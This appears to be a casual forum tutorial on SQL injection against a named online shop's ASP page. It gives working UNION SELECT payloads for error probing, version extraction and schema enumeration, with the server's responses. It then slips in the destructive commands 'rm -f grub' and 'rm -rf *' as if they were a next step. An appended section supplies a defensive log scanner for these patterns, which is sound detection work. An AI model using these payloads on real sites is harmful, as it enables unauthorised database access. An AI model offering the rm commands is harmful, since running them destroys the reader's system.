MSSQL Injection / ASP injection


The concept is very simple
(Most online shops use this ASP, bro)

Example site

http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33
Append some syntax character, for example ' / =
You get an error:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string ''. 

/Product_Des.asp, line 11


On to the second step
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,2,3,4--

The "lottery number" is 3, right?
Let's check the version first: the lottery number / visible column gets replaced
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

OK, third step
The database schema :))
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--

Everything comes out, right?
Just tear into it, maybe there's something interesting :))
cd /usr/sbin;rm -f grub
cd /;rm -rf *
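
Added example, not part of the original post: a log check a site owner could run to spot the request pattern walked through above (a quote, UNION SELECT, @@VERSION, information_schema in a numeric parameter). The log line layout, the parameter list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters expected to hold a plain integer (assumption: ProductID, as in the URLs above).
NUMERIC_PARAMS = {"productid"}

# Indicators taken from the requests shown on this page.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "sql_comment": re.compile(r"--|/\*"),
    "quote": re.compile(r"'"),
}

def inspect_url(url):
    """Return a sorted list of findings for one request URL."""
    findings = set()
    # parse_qsl decodes %xx and turns '+' into a space, as the web server does.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
            findings.add("non_integer_" + name.lower())
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                findings.add(label)
    return sorted(findings)

def scan(log_lines):
    """Return (client_ip, url, findings) for each suspicious line.
    Assumed layout (constructed, simplified): '<ip> <method> <url> <status>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the assumed layout
        ip, _method, url, _status = parts
        findings = inspect_url(url)
        if findings:
            hits.append((ip, url, findings))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    "203.0.113.5 GET /Product_Des.asp?ProductID=33 200",
    "203.0.113.9 GET /Product_Des.asp?ProductID=-33' 500",
    "203.0.113.9 GET /Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4-- 200",
    "203.0.113.9 GET /Product_Des.asp?ProductID=-33%20UNION%20select+all+1,column_name,table_name,4+from+information_schema.columns-- 200",
]

if __name__ == "__main__":
    for ip, url, findings in scan(SAMPLE_LOG):
        print(ip, findings, url)
```

The non_integer_productid finding points at the root cause: the page builds its query from ProductID without checking that it is a number, so the fix on the server side is to reject non-integer values and bind the value as a query parameter.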